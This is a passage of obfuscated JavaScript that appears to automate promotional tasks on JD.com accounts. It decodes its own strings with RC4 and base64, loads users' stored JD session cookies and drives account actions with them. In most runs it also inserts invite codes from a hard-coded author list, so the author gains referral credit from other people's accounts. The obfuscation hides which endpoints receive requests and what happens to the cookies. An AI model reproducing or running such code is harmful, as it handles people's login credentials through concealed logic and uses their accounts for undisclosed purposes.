_0x241ded(++_0x5e9ab2,_0x175cf3)>>_0x5e9ab2^_0x175cf3;}(_0x1f94,0x17d,0x17d00),_0x1f94){_0xodF_=_0x1f94['length']^0x17d;};function _0x537f(_0x303e6f,_0x339098){_0x303e6f=~~'0x'['concat'](_0x303e6f['slice'](0x1));var _0x51c395=_0x1f94[_0x303e6f];if(_0x537f['WEaYBW']===undefined){(function(){var _0x314273=function(){var _0x9dbd1e;try{_0x9dbd1e=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x42774e){_0x9dbd1e=window;}return _0x9dbd1e;};var _0x1bf281=_0x314273();var _0x3573fe='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1bf281['atob']||(_0x1bf281['atob']=function(_0x5f3c2d){var _0xddcd83=String(_0x5f3c2d)['replace'](/=+$/,'');for(var _0x9c5e91=0x0,_0x1e0b46,_0x35607d,_0x26af03=0x0,_0x402f52='';_0x35607d=_0xddcd83['charAt'](_0x26af03++);~_0x35607d&&(_0x1e0b46=_0x9c5e91%0x4?_0x1e0b46*0x40+_0x35607d:_0x35607d,_0x9c5e91++%0x4)?_0x402f52+=String['fromCharCode'](0xff&_0x1e0b46>>(-0x2*_0x9c5e91&0x6)):0x0){_0x35607d=_0x3573fe['indexOf'](_0x35607d);}return _0x402f52;});}());function _0x585b24(_0xbcf093,_0x339098){var _0x2a4e22=[],_0x4804d0=0x0,_0x55c8c3,_0x654c88='',_0x3736d2='';_0xbcf093=atob(_0xbcf093);for(var _0x526898=0x0,_0x262eef=_0xbcf093['length'];_0x526898<_0x262eef;_0x526898++){_0x3736d2+='%'+('00'+_0xbcf093['charCodeAt'](_0x526898)['toString'](0x10))['slice'](-0x2);}_0xbcf093=decodeURIComponent(_0x3736d2);for(var _0x52e17b=0x0;_0x52e17b<0x100;_0x52e17b++){_0x2a4e22[_0x52e17b]=_0x52e17b;}for(_0x52e17b=0x0;_0x52e17b<0x100;_0x52e17b++){_0x4804d0=(_0x4804d0+_0x2a4e22[_0x52e17b]+_0x339098['charCodeAt'](_0x52e17b%_0x339098['length']))%0x100;_0x55c8c3=_0x2a4e22[_0x52e17b];_0x2a4e22[_0x52e17b]=_0x2a4e22[_0x4804d0];_0x2a4e22[_0x4804d0]=_0x55c8c3;}_0x52e17b=0x0;_0x4804d0=0x0;for(var _0x4b765c=0x0;_0x4b765c<_0xbcf093['length'];_0x4b765c++){_0x52e17b=(_0x52e17b+0x1)%0x100;_0x4804d0=(_0x4804d0+_0x2a4e22[_0x52e17b])%0x100;_0x55c8c3=_0x2a4e22[_0x52e17b];_0x2a4e22[_0x52e17b]=_0x2a4e22[_0x4804d0];_0x2a4e22[_0x4804d0]=_0x55c8c3;_0x654c88+=String['fromCharCode'](_0xbcf093['charCodeAt'](_0x4b765c)^_0x2a4e22[(_0x2a4e22[_0x52e17b]+_0x2a4e22[_0x4804d0])%0x100]);}return _0x654c88;}_0x537f['aVjftH']=_0x585b24;_0x537f['tFtUim']={};_0x537f['WEaYBW']=!![];}var _0x203a3f=_0x537f['tFtUim'][_0x303e6f];if(_0x203a3f===undefined){if(_0x537f['WWHwZc']===undefined){_0x537f['WWHwZc']=!![];}_0x51c395=_0x537f['aVjftH'](_0x51c395,_0x339098);_0x537f['tFtUim'][_0x303e6f]=_0x51c395;}else{_0x51c395=_0x203a3f;}return _0x51c395;};const $=new Env(_0x537f('‮0','\x47\x55\x21\x39'));const jdCookieNode=$[_0x537f('‮1','\x25\x72\x61\x32')]()?require(_0x537f('‮2','\x47\x41\x6c\x29')):'';const notify=$[_0x537f('‮3','\x48\x32\x4d\x34')]()?require(_0x537f('‫4','\x4e\x77\x4a\x29')):'';let cookiesArr=[],cookie='',message='';let ownCode=null;if($[_0x537f('‮5','\x5e\x66\x72\x34')]()){Object[_0x537f('‮6','\x50\x71\x4a\x36')](jdCookieNode)[_0x537f('‫7','\x73\x36\x26\x66')](_0x47af81=>{cookiesArr[_0x537f('‮8','\x73\x36\x26\x66')](jdCookieNode[_0x47af81]);});if(process[_0x537f('‫9','\x21\x5d\x2a\x38')][_0x537f('‫a','\x25\x72\x61\x32')]&&process[_0x537f('‫b','\x4a\x4c\x6d\x73')][_0x537f('‫c','\x37\x50\x30\x37')]===_0x537f('‫d','\x47\x41\x6c\x29'))console[_0x537f('‮e','\x6b\x76\x2a\x41')]=()=>{};}else{let cookiesData=$[_0x537f('‫f','\x25\x72\x61\x32')](_0x537f('‫10','\x47\x55\x21\x39'))||'\x5b\x5d';cookiesData=JSON[_0x537f('‮11','\x39\x29\x43\x49')](cookiesData);cookiesArr=cookiesData[_0x537f('‫12','\x38\x69\x75\x72')](_0x58350f=>_0x58350f[_0x537f('‮13','\x69\x71\x68\x37')]);cookiesArr[_0x537f('‫14','\x71\x2a\x6b\x35')]();cookiesArr[_0x537f('‮15','\x38\x69\x75\x72')](...[$[_0x537f('‫16','\x4e\x59\x73\x4d')](_0x537f('‫17','\x61\x57\x50\x78')),$[_0x537f('‫18','\x34\x24\x6a\x36')](_0x537f('‮19','\x48\x5e\x5a\x32'))]);cookiesArr[_0x537f('‫1a','\x4a\x4c\x6d\x73')]();cookiesArr=cookiesArr[_0x537f('‮1b','\x21\x6c\x36\x75')](_0x249a89=>!!_0x249a89);}!(async()=>{var _0x292c87={'\x6b\x7a\x79\x6f\x75':function(_0x1a1fa1,_0x328275){return _0x1a1fa1+_0x328275;},'\x7a\x6d\x76\x56\x4e':_0x537f('‮1c','\x4e\x77\x4a\x29'),'\x6e\x66\x57\x6e\x46':_0x537f('‮1d','\x42\x5a\x6a\x6c'),'\x4d\x42\x44\x72\x71':_0x537f('‫1e','\x5b\x53\x4c\x61'),'\x44\x59\x48\x77\x55':_0x537f('‫1f','\x26\x58\x58\x73'),'\x62\x68\x41\x68\x5a':_0x537f('‮20','\x6a\x23\x34\x64'),'\x4d\x6c\x66\x59\x79':_0x537f('‮21','\x42\x78\x58\x51'),'\x50\x57\x7a\x65\x69':function(_0x218404,_0x4ae573){return _0x218404<_0x4ae573;},'\x48\x51\x57\x53\x50':function(_0x488b68,_0x907246){return _0x488b68!==_0x907246;},'\x78\x70\x6a\x6d\x4a':_0x537f('‮22','\x21\x5d\x2a\x38'),'\x51\x54\x6a\x67\x48':function(_0x1aa44a,_0x3d0caf){return _0x1aa44a+_0x3d0caf;},'\x63\x7a\x72\x6d\x59':function(_0x1d5c4a,_0x104031){return _0x1d5c4a===_0x104031;},'\x79\x6b\x56\x57\x44':function(_0x2f8c41,_0x1761a3){return _0x2f8c41!==_0x1761a3;},'\x77\x48\x6f\x47\x66':_0x537f('‫23','\x37\x50\x30\x37'),'\x53\x56\x69\x47\x47':_0x537f('‫24','\x35\x53\x5e\x57'),'\x55\x48\x6a\x7a\x68':function(_0x2af410,_0x295694){return _0x2af410(_0x295694);},'\x44\x56\x55\x55\x51':function(_0x2fc720,_0xf3413){return _0x2fc720+_0xf3413;},'\x61\x64\x4a\x4b\x55':function(_0x30dff4){return _0x30dff4();},'\x46\x52\x6a\x76\x73':function(_0x2d9c9d,_0x4b2a8f,_0x269c8d){return _0x2d9c9d(_0x4b2a8f,_0x269c8d);},'\x55\x67\x76\x78\x50':_0x537f('‮25','\x6a\x23\x34\x64'),'\x4f\x6a\x65\x6e\x6f':_0x537f('‫26','\x59\x4d\x24\x31'),'\x7a\x53\x50\x48\x59':_0x537f('‮27','\x67\x57\x44\x6e'),'\x63\x66\x70\x51\x6f':_0x537f('‫28','\x47\x55\x21\x39'),'\x49\x54\x76\x6a\x55':_0x537f('‮29','\x59\x4d\x24\x31'),'\x6b\x53\x53\x68\x6c':_0x537f('‮2a','\x42\x6d\x46\x4a'),'\x66\x73\x48\x75\x51':_0x537f('‮2b','\x4c\x52\x32\x62'),'\x6e\x62\x6f\x44\x59':_0x537f('‫2c','\x74\x41\x72\x35'),'\x47\x46\x54\x77\x55':_0x537f('‮2d','\x38\x69\x75\x72'),'\x77\x41\x48\x62\x56':_0x537f('‫2e','\x39\x29\x43\x49'),'\x6b\x63\x69\x56\x71':_0x537f('‮2f','\x61\x6c\x61\x53'),'\x4f\x59\x73\x47\x48':_0x537f('‫30','\x47\x55\x21\x39'),'\x70\x47\x76\x54\x7a':_0x537f('‮31','\x4c\x52\x32\x62'),'\x51\x69\x62\x72\x50':function(_0x28e3bb){return _0x28e3bb();},'\x68\x78\x4d\x4c\x62':function(_0x50e144,_0x2ae969){return _0x50e144>_0x2ae969;},'\x58\x6e\x66\x4b\x70':_0x537f('‮32','\x59\x4d\x24\x31'),'\x68\x43\x76\x43\x53':_0x537f('‫33','\x71\x2a\x6b\x35'),'\x6e\x48\x4f\x67\x7a':_0x537f('‮34','\x78\x28\x63\x48'),'\x49\x66\x64\x50\x5a':_0x537f('‮35','\x34\x24\x6a\x36')};if(!cookiesArr[0x0]){$[_0x537f('‮36','\x26\x58\x58\x73')]($[_0x537f('‫37','\x34\x24\x6a\x36')],_0x292c87[_0x537f('‮38','\x4c\x58\x6d\x49')],_0x292c87[_0x537f('‮39','\x39\x29\x43\x49')],{'open-url':_0x292c87[_0x537f('‫3a','\x38\x69\x75\x72')]});return;}$[_0x537f('‫3b','\x4a\x4c\x6d\x73')]=0x0;console[_0x537f('‮3c','\x31\x26\x59\x5e')](_0x292c87[_0x537f('‫3d','\x39\x29\x43\x49')]);let _0x11321e=[];for(let _0x44d130=0x0;_0x292c87[_0x537f('‫3e','\x38\x69\x75\x72')](_0x44d130,cookiesArr[_0x537f('‮3f','\x5e\x66\x72\x34')]);_0x44d130+=0x14){if(_0x292c87[_0x537f('‫40','\x74\x41\x72\x35')](_0x292c87[_0x537f('‫41','\x43\x73\x21\x37')],_0x292c87[_0x537f('‫41','\x43\x73\x21\x37')])){$[_0x537f('‮42','\x78\x28\x63\x48')]=data[_0x537f('‫43','\x6b\x76\x2a\x41')][_0x537f('‮44','\x26\x37\x4e\x4d')][_0x537f('‫45','\x47\x41\x6c\x29')][_0x537f('‮46','\x6a\x23\x34\x64')];}else{_0x11321e[_0x537f('‫47','\x4c\x58\x6d\x49')](cookiesArr[_0x537f('‫48','\x73\x36\x26\x66')](_0x44d130,_0x292c87[_0x537f('‮49','\x50\x71\x4a\x36')](_0x44d130,0x14)));}}for(let _0xd19a0b=0x0;_0x292c87[_0x537f('‫4a','\x67\x57\x44\x6e')](_0xd19a0b,_0x11321e[_0x537f('‫4b','\x78\x75\x46\x50')]);_0xd19a0b++){try{let _0x2277b4=_0x11321e[_0xd19a0b];const _0x2bbf7b=_0x2277b4[_0x537f('‮4c','\x67\x57\x44\x6e')]((_0x48da33,_0x32419d)=>main(_0x48da33));await Promise[_0x537f('‫4d','\x39\x29\x43\x49')](_0x2bbf7b);}catch(_0x53bf3c){}}if(_0x292c87[_0x537f('‮4e','\x39\x29\x43\x49')]($[_0x537f('‮4f','\x38\x69\x75\x72')],0x1)){for(let _0x53ae8d=0x0;_0x292c87[_0x537f('‮50','\x4e\x77\x4a\x29')](_0x53ae8d,cookiesArr[_0x537f('‫51','\x61\x57\x50\x78')]);_0x53ae8d++){if(cookiesArr[_0x53ae8d]){if(_0x292c87[_0x537f('‮52','\x6a\x23\x34\x64')](_0x292c87[_0x537f('‫53','\x69\x71\x68\x37')],_0x292c87[_0x537f('‮54','\x24\x51\x37\x78')])){cookie=cookiesArr[_0x53ae8d];originCookie=cookiesArr[_0x53ae8d];newCookie='';$[_0x537f('‮55','\x31\x26\x59\x5e')]=_0x292c87[_0x537f('‮56','\x37\x50\x30\x37')](decodeURIComponent,cookie[_0x537f('‮57','\x47\x41\x6c\x29')](/pt_pin=(.+?);/)&&cookie[_0x537f('‮58','\x26\x37\x4e\x4d')](/pt_pin=(.+?);/)[0x1]);$[_0x537f('‮59','\x48\x5e\x5a\x32')]=_0x292c87[_0x537f('‮5a','\x5e\x66\x72\x34')](_0x53ae8d,0x1);$[_0x537f('‫5b','\x31\x26\x59\x5e')]=!![];$[_0x537f('‫5c','\x38\x69\x75\x72')]='';await _0x292c87[_0x537f('‫5d','\x44\x61\x6f\x44')](checkCookie);console[_0x537f('‫5e','\x42\x5a\x6a\x6c')](_0x537f('‫5f','\x38\x69\x75\x72')+$[_0x537f('‫60','\x43\x73\x21\x37')]+'\u3011'+($[_0x537f('‫61','\x74\x41\x72\x35')]||$[_0x537f('‫62','\x26\x58\x58\x73')])+_0x537f('‫63','\x42\x52\x6d\x30'));if(!$[_0x537f('‮64','\x21\x5d\x2a\x38')]){$[_0x537f('‮65','\x73\x21\x78\x6d')]($[_0x537f('‮66','\x4c\x43\x4c\x76')],_0x537f('‮67','\x50\x71\x4a\x36'),_0x537f('‮68','\x38\x69\x75\x72')+$[_0x537f('‮69','\x21\x6c\x36\x75')]+'\x20'+($[_0x537f('‫6a','\x73\x21\x78\x6d')]||$[_0x537f('‮6b','\x21\x6c\x36\x75')])+_0x537f('‫6c','\x29\x37\x50\x38'),{'open-url':_0x292c87[_0x537f('‮6d','\x42\x5a\x6a\x6c')]});if($[_0x537f('‮6e','\x34\x24\x6a\x36')]()){}continue;}$[_0x537f('‮6f','\x38\x69\x75\x72')]=0x0;$[_0x537f('‫70','\x47\x55\x21\x39')]=_0x292c87[_0x537f('‮71','\x25\x72\x61\x32')](getUUID,_0x292c87[_0x537f('‫72','\x61\x6c\x61\x53')],0x1);$[_0x537f('‫73','\x26\x58\x58\x73')]=_0x292c87[_0x537f('‫74','\x78\x75\x46\x50')](getUUID,_0x292c87[_0x537f('‮75','\x6b\x76\x2a\x41')]);authorCodeList=[_0x292c87[_0x537f('‫76','\x42\x5a\x6a\x6c')],_0x292c87[_0x537f('‮77','\x6b\x76\x2a\x41')],_0x292c87[_0x537f('‫78','\x6a\x23\x34\x64')],_0x292c87[_0x537f('‫79','\x4c\x43\x4c\x76')],_0x292c87[_0x537f('‮7a','\x59\x4d\x24\x31')],_0x292c87[_0x537f('‮7b','\x39\x29\x43\x49')],_0x292c87[_0x537f('‮7c','\x46\x71\x33\x64')],_0x292c87[_0x537f('‮7d','\x61\x6c\x61\x53')]];$[_0x537f('‮7e','\x47\x55\x21\x39')]=_0x292c87[_0x537f('‫7f','\x37\x50\x30\x37')];$[_0x537f('‮80','\x44\x61\x6f\x44')]=_0x292c87[_0x537f('‮81','\x31\x26\x59\x5e')];$[_0x537f('‫82','\x43\x73\x21\x37')]=_0x292c87[_0x537f('‫83','\x42\x6d\x46\x4a')];$[_0x537f('‫84','\x4c\x52\x32\x62')]=ownCode?ownCode:authorCodeList[_0x292c87[_0x537f('‮85','\x42\x78\x58\x51')](random,0x0,authorCodeList[_0x537f('‫86','\x4e\x77\x4a\x29')])];await _0x292c87[_0x537f('‫87','\x69\x71\x68\x37')](mpdz);await $[_0x537f('‮88','\x4e\x59\x73\x4d')](0x7d0);if(_0x292c87[_0x537f('‮89','\x48\x32\x4d\x34')]($[_0x537f('‫8a','\x42\x52\x6d\x30')],0x0)){message+=_0x537f('‫8b','\x28\x26\x6c\x4a')+$[_0x537f('‫8c','\x5e\x66\x72\x34')]+'\u3011'+($[_0x537f('‮42','\x78\x28\x63\x48')]||$[_0x537f('‮8d','\x21\x5d\x2a\x38')])+_0x537f('‮8e','\x31\x26\x59\x5e')+$[_0x537f('‫8a','\x42\x52\x6d\x30')]+_0x537f('‮8f','\x5b\x53\x4c\x61');}}else{ownCode=$[_0x537f('‫90','\x73\x36\x26\x66')];console[_0x537f('‫91','\x42\x78\x58\x51')](_0x292c87[_0x537f('‮92','\x4c\x52\x32\x62')](_0x292c87[_0x537f('‮93','\x26\x58\x58\x73')],ownCode));}}}}if(_0x292c87[_0x537f('‮94','\x4e\x77\x4a\x29')](message,'')){if($[_0x537f('‫95','\x29\x37\x50\x38')]()){if(_0x292c87[_0x537f('‮96','\x6b\x76\x2a\x41')](_0x292c87[_0x537f('‫97','\x59\x4d\x24\x31')],_0x292c87[_0x537f('‫98','\x4c\x52\x32\x62')])){await notify[_0x537f('‮99','\x78\x28\x63\x48')]($[_0x537f('‫9a','\x26\x58\x58\x73')],message,'','\x0a');}else{$[_0x537f('‮9b','\x4c\x58\x6d\x49')](_0x292c87[_0x537f('‮9c','\x5e\x66\x72\x34')]);}}else{if(_0x292c87[_0x537f('‮9d','\x78\x75\x46\x50')](_0x292c87[_0x537f('‫9e','\x73\x36\x26\x66')],_0x292c87[_0x537f('‫9f','\x59\x4d\x24\x31')])){$[_0x537f('‮a0','\x47\x55\x21\x39')]($[_0x537f('‮a1','\x5e\x66\x72\x34')],_0x292c87[_0x537f('‮a2','\x47\x41\x6c\x29')],message);}else{$[_0x537f('‮a3','\x5b\x53\x4c\x61')]($[_0x537f('‫a4','\x74\x41\x72\x35')],_0x292c87[_0x537f('‮a5','\x34\x24\x6a\x36')],message);}}}})()[_0x537f('‮a6','\x4c\x43\x4c\x76')](_0xc76e14=>{$[_0x537f('‮e','\x6b\x76\x2a\x41')]('','\u274c\x20'+$[_0x537f('‮a7','\x61\x6c\x61\x53')]+_0x537f('‮a8','\x43\x73\x21\x37')+_0xc76e14+'\x21','');})[_0x537f('‫a9','\x69\x71\x68\x37')](()=>{$[_0x537f('‫aa','\x6e\x7a\x78\x6f')]();});async function mpdz(){var _0x57a8f0={'\x4a\x77\x55\x72\x62':function(_0x59102b){return _0x59102b();},'\x51\x51\x4a\x48\x58':function(_0x4cb526,_0x128972){return _0x4cb526===_0x128972;},'\x59\x66\x4d\x76\x73':_0x537f('‫ab','\x67\x57\x44\x6e'),'\x52\x6c\x6d\x79\x58':function(_0x1fa86e,_0xf507dc){return _0x1fa86e===_0xf507dc;},'\x71\x45\x78\x52\x71':_0x537f('‫ac','\x26\x58\x58\x73'),'\x72\x50\x42\x6c\x4d':function(_0x42b2ad,_0x2a8c02){return _0x42b2ad+_0x2a8c02;},'\x48\x7a\x6b\x55\x48':function(_0x5780df){return _0x5780df();},'\x54\x6e\x61\x63\x78':function(_0x2c9d93,_0x37bbfd,_0x2fe738,_0x59f7dc){return _0x2c9d93(_0x37bbfd,_0x2fe738,_0x59f7dc);},'\x59\x45\x79\x6c\x72':_0x537f('‮ad','\x4a\x4c\x6d\x73'),'\x6a\x53\x61\x6e\x75':_0x537f('‫ae','\x28\x26\x6c\x4a'),'\x4f\x65\x78\x42\x5a':function(_0x201b30,_0x2285e5){return _0x201b30+_0x2285e5;},'\x4f\x59\x46\x67\x53':_0x537f('‮af','\x44\x61\x6f\x44'),'\x4f\x62\x62\x64\x41':function(_0xdd1572,_0x1000c4){return _0xdd1572===_0x1000c4;},'\x61\x76\x74\x4e\x6b':_0x537f('‫b0','\x50\x71\x4a\x36'),'\x42\x63\x6b\x68\x6c':_0x537f('‮b1','\x47\x55\x21\x39'),'\x68\x6f\x4f\x59\x53':_0x537f('‮b2','\x39\x29\x43\x49'),'\x71\x47\x67\x46\x54':_0x537f('‮b3','\x21\x5d\x2a\x38'),'\x56\x50\x72\x5a\x76':function(_0x313881,_0x1d6299,_0x23f664){return _0x313881(_0x1d6299,_0x23f664);},'\x74\x4a\x67\x78\x57':_0x537f('‮b4','\x78\x75\x46\x50'),'\x58\x59\x56\x49\x41':_0x537f('‮b5','\x4a\x4c\x6d\x73'),'\x67\x49\x70\x51\x6f':_0x537f('‫b6','\x38\x69\x75\x72'),'\x6f\x6a\x73\x51\x63':function(_0x2243c9,_0x4f3042,_0x9c6b08){return _0x2243c9(_0x4f3042,_0x9c6b08);},'\x79\x41\x78\x62\x4b':_0x537f('‫b7','\x5e\x66\x72\x34'),'\x64\x79\x77\x59\x51':function(_0x1bc277,_0xe8164f){return _0x1bc277===_0xe8164f;},'\x70\x4b\x4b\x55\x75':_0x537f('‮b8','\x73\x36\x26\x66'),'\x49\x43\x6e\x4b\x52':function(_0x3f2388,_0x4c8725){return _0x3f2388===_0x4c8725;},'\x57\x72\x7a\x63\x61':_0x537f('‮b9','\x26\x37\x4e\x4d'),'\x43\x51\x44\x4b\x68':_0x537f('‮ba','\x4c\x58\x6d\x49'),'\x72\x61\x73\x78\x6d':function(_0x583746,_0x5c5afc){return _0x583746!==_0x5c5afc;},'\x56\x63\x54\x68\x48':_0x537f('‮bb','\x39\x29\x43\x49'),'\x51\x4b\x4d\x74\x63':_0x537f('‮bc','\x61\x57\x50\x78'),'\x74\x75\x4e\x6d\x45':function(_0x785cb4,_0x118dfb){return _0x785cb4===_0x118dfb;},'\x78\x4b\x50\x66\x69':_0x537f('‫bd','\x44\x61\x6f\x44'),'\x77\x63\x6d\x67\x71':function(_0x396327,_0x5b19e2){return _0x396327!==_0x5b19e2;},'\x62\x58\x72\x4d\x51':_0x537f('‮be','\x78\x75\x46\x50'),'\x54\x4e\x79\x61\x6f':_0x537f('‫bf','\x21\x5d\x2a\x38'),'\x69\x46\x76\x6c\x58':_0x537f('‮c0','\x4e\x77\x4a\x29'),'\x59\x52\x52\x45\x72':_0x537f('‮c1','\x6a\x23\x34\x64'),'\x71\x5a\x50\x68\x45':function(_0x5e49b2,_0x686b){return _0x5e49b2===_0x686b;},'\x48\x76\x56\x51\x59':_0x537f('‮c2','\x38\x69\x75\x72'),'\x74\x50\x42\x47\x6c':_0x537f('‮c3','\x29\x37\x50\x38'),'\x42\x4e\x44\x50\x69':function(_0x25ac37,_0x487299,_0x491644){return _0x25ac37(_0x487299,_0x491644);},'\x6a\x73\x42\x79\x59':_0x537f('‫c4','\x29\x37\x50\x38'),'\x6b\x58\x48\x47\x6d':function(_0x424374,_0x191fed,_0x1a76ce){return _0x424374(_0x191fed,_0x1a76ce);},'\x48\x72\x45\x4d\x77':function(_0x19ba9e,_0x12f5a8){return _0x19ba9e===_0x12f5a8;},'\x62\x53\x42\x4f\x6a':_0x537f('‫c5','\x21\x6c\x36\x75'),'\x76\x78\x42\x48\x74':_0x537f('‮c6','\x38\x69\x75\x72'),'\x55\x71\x68\x7a\x64':function(_0x54f476,_0x306ad1){return _0x54f476+_0x306ad1;},'\x6d\x51\x7a\x6e\x68':_0x537f('‫c7','\x48\x5e\x5a\x32'),'\x75\x48\x73\x6c\x48':function(_0x4d9279,_0x3ff22b){return _0x4d9279!=_0x3ff22b;},'\x44\x6d\x54\x74\x4c':_0x537f('‮c8','\x69\x71\x68\x37'),'\x6a\x74\x52\x72\x48':function(_0x364a3a,_0x2835a1,_0x5959c2){return _0x364a3a(_0x2835a1,_0x5959c2);},'\x65\x72\x67\x51\x54':_0x537f('‮c9','\x26\x58\x58\x73'),'\x71\x6b\x5a\x4a\x57':_0x537f('‫ca','\x61\x57\x50\x78'),'\x67\x79\x75\x5a\x48':_0x537f('‮cb','\x21\x5d\x2a\x38'),'\x73\x7a\x71\x65\x41':_0x537f('‫cc','\x6e\x7a\x78\x6f'),'\x74\x46\x57\x74\x65':function(_0x21ccd0,_0x2db735,_0xfde08c){return _0x21ccd0(_0x2db735,_0xfde08c);},'\x73\x56\x52\x50\x6a':_0x537f('‫cd','\x6b\x76\x2a\x41'),'\x50\x4a\x55\x56\x70':_0x537f('‫ce','\x38\x69\x75\x72'),'\x47\x73\x4b\x69\x6d':_0x537f('‫cf','\x38\x69\x75\x72'),'\x67\x66\x59\x5a\x71':_0x537f('‫d0','\x43\x73\x21\x37'),'\x61\x72\x57\x6f\x6d':_0x537f('‮d1','\x43\x73\x21\x37'),'\x70\x72\x59\x79\x78':_0x537f('‫d2','\x50\x71\x4a\x36')};$[_0x537f('‫d3','\x48\x5e\x5a\x32')]=null;$[_0x537f('‮d4','\x73\x21\x78\x6d')]=null;$[_0x537f('‮d5','\x43\x73\x21\x37')]=null;$[_0x537f('‫d6','\x39\x29\x43\x49')]=null;await _0x57a8f0[_0x537f('‫d7','\x4c\x52\x32\x62')](getToken);if($[_0x537f('‫d8','\x29\x37\x50\x38')]){await $[_0x537f('‮d9','\x46\x71\x33\x64')](0x7d0);await _0x57a8f0[_0x537f('‫da','\x24\x51\x37\x78')](task,_0x57a8f0[_0x537f('‮db','\x29\x37\x50\x38')],{'inviteNick':$[_0x537f('‮dc','\x47\x41\x6c\x29')],'jdToken':$[_0x537f('‮dd','\x26\x58\x58\x73')],'shopId':null},0x0);await $[_0x537f('‮de','\x74\x41\x72\x35')](0x7d0);if($[_0x537f('‫df','\x4e\x59\x73\x4d')]){if(_0x57a8f0[_0x537f('‮e0','\x4a\x4c\x6d\x73')](_0x57a8f0[_0x537f('‮e1','\x37\x50\x30\x37')],_0x57a8f0[_0x537f('‫e2','\x25\x72\x61\x32')])){console[_0x537f('‫91','\x42\x78\x58\x51')](_0x57a8f0[_0x537f('‫e3','\x21\x6c\x36\x75')](_0x57a8f0[_0x537f('‫e4','\x5e\x66\x72\x34')],$[_0x537f('‮e5','\x69\x71\x68\x37')]));if(_0x57a8f0[_0x537f('‮e6','\x74\x41\x72\x35')]($[_0x537f('‮e7','\x39\x29\x43\x49')],0x1)){if(_0x57a8f0[_0x537f('‮e8','\x4c\x43\x4c\x76')](_0x57a8f0[_0x537f('‫e9','\x31\x26\x59\x5e')],_0x57a8f0[_0x537f('‫ea','\x74\x41\x72\x35')])){_0x57a8f0[_0x537f('‫eb','\x5e\x66\x72\x34')](resolve);}else{ownCode=$[_0x537f('‮ec','\x50\x71\x4a\x36')];console[_0x537f('‮e','\x6b\x76\x2a\x41')](_0x57a8f0[_0x537f('‮ed','\x61\x57\x50\x78')](_0x57a8f0[_0x537f('‮ee','\x4e\x59\x73\x4d')],ownCode));}}await $[_0x537f('‫ef','\x25\x72\x61\x32')](0x7d0);console[_0x537f('‮f0','\x73\x21\x78\x6d')](_0x57a8f0[_0x537f('‫f1','\x37\x50\x30\x37')]);await _0x57a8f0[_0x537f('‫f2','\x67\x36\x57\x4e')](task,_0x57a8f0[_0x537f('‮f3','\x4e\x59\x73\x4d')],{'missionType':_0x57a8f0[_0x537f('‮f4','\x21\x6c\x36\x75')],'inviterNick':$[_0x537f('‫f5','\x42\x5a\x6a\x6c')]});await $[_0x537f('‮f6','\x35\x53\x5e\x57')](0x7d0);console[_0x537f('‫f7','\x28\x26\x6c\x4a')](_0x57a8f0[_0x537f('‮f8','\x78\x28\x63\x48')]);await _0x57a8f0[_0x537f('‮f9','\x21\x6c\x36\x75')](task,_0x57a8f0[_0x537f('‮fa','\x21\x5d\x2a\x38')],{});for(const _0x464378 of $[_0x537f('‫fb','\x61\x57\x50\x78')]){if(_0x57a8f0[_0x537f('‫fc','\x73\x36\x26\x66')](_0x464378[_0x537f('‮fd','\x42\x6d\x46\x4a')],_0x57a8f0[_0x537f('‮fe','\x42\x6d\x46\x4a')])||_0x57a8f0[_0x537f('‫ff','\x35\x53\x5e\x57')](_0x464378[_0x537f('‫100','\x4e\x77\x4a\x29')],_0x57a8f0[_0x537f('‮101','\x4e\x59\x73\x4d')])||_0x57a8f0[_0x537f('‮102','\x5e\x66\x72\x34')](_0x464378[_0x537f('‮103','\x37\x50\x30\x37')],_0x57a8f0[_0x537f('‮104','\x48\x5e\x5a\x32')])||_0x57a8f0[_0x537f('‮105','\x69\x71\x68\x37')](_0x464378[_0x537f('‮106','\x25\x72\x61\x32')],_0x57a8f0[_0x537f('‫107','\x42\x6d\x46\x4a')])){continue;}await $[_0x537f('‫108','\x42\x6d\x46\x4a')](0x7d0);if(_0x57a8f0[_0x537f('‮109','\x73\x36\x26\x66')](_0x464378[_0x537f('‮10a','\x4e\x77\x4a\x29')],![])){if(_0x57a8f0[_0x537f('‮10b','\x38\x69\x75\x72')](_0x57a8f0[_0x537f('‫10c','\x21\x5d\x2a\x38')],_0x57a8f0[_0x537f('‫10d','\x42\x52\x6d\x30')])){console[_0x537f('‫10e','\x47\x41\x6c\x29')](_0x464378[_0x537f('‮10f','\x35\x53\x5e\x57')]);if(_0x57a8f0[_0x537f('‮110','\x71\x2a\x6b\x35')](_0x464378[_0x537f('‮111','\x6b\x76\x2a\x41')],_0x57a8f0[_0x537f('‫112','\x6b\x76\x2a\x41')])){if(_0x57a8f0[_0x537f('‮113','\x25\x72\x61\x32')](_0x57a8f0[_0x537f('‫114','\x42\x52\x6d\x30')],_0x57a8f0[_0x537f('‮115','\x35\x53\x5e\x57')])){await _0x57a8f0[_0x537f('‮116','\x59\x4d\x24\x31')](task,_0x57a8f0[_0x537f('‫117','\x4c\x58\x6d\x49')],{});console[_0x537f('‮118','\x50\x71\x4a\x36')](_0x57a8f0[_0x537f('‮119','\x42\x52\x6d\x30')](_0x57a8f0[_0x537f('‮11a','\x6e\x7a\x78\x6f')],$[_0x537f('‮11b','\x24\x51\x37\x78')]));await _0x57a8f0[_0x537f('‫11c','\x39\x29\x43\x49')](task,_0x57a8f0[_0x537f('‮11d','\x42\x6d\x46\x4a')],{'missionType':_0x464378[_0x537f('‮106','\x25\x72\x61\x32')],'shopId':$[_0x537f('‫11e','\x42\x5a\x6a\x6c')]});break;}else{data=JSON[_0x537f('‮11f','\x50\x71\x4a\x36')](data);if(_0x57a8f0[_0x537f('‫120','\x47\x41\x6c\x29')](data[_0x537f('‫121','\x69\x71\x68\x37')],_0x57a8f0[_0x537f('‫122','\x34\x24\x6a\x36')])){$[_0x537f('‫123','\x73\x21\x78\x6d')]=![];return;}if(_0x57a8f0[_0x537f('‫124','\x37\x50\x30\x37')](data[_0x537f('‫125','\x4e\x59\x73\x4d')],'\x30')&&data[_0x537f('‫126','\x67\x36\x57\x4e')][_0x537f('‫127','\x4c\x58\x6d\x49')](_0x57a8f0[_0x537f('‮128','\x48\x5e\x5a\x32')])){$[_0x537f('‫129','\x46\x71\x33\x64')]=data[_0x537f('‮12a','\x4c\x52\x32\x62')][_0x537f('‮12b','\x24\x51\x37\x78')][_0x537f('‮12c','\x4c\x58\x6d\x49')][_0x537f('‮12d','\x21\x6c\x36\x75')];}}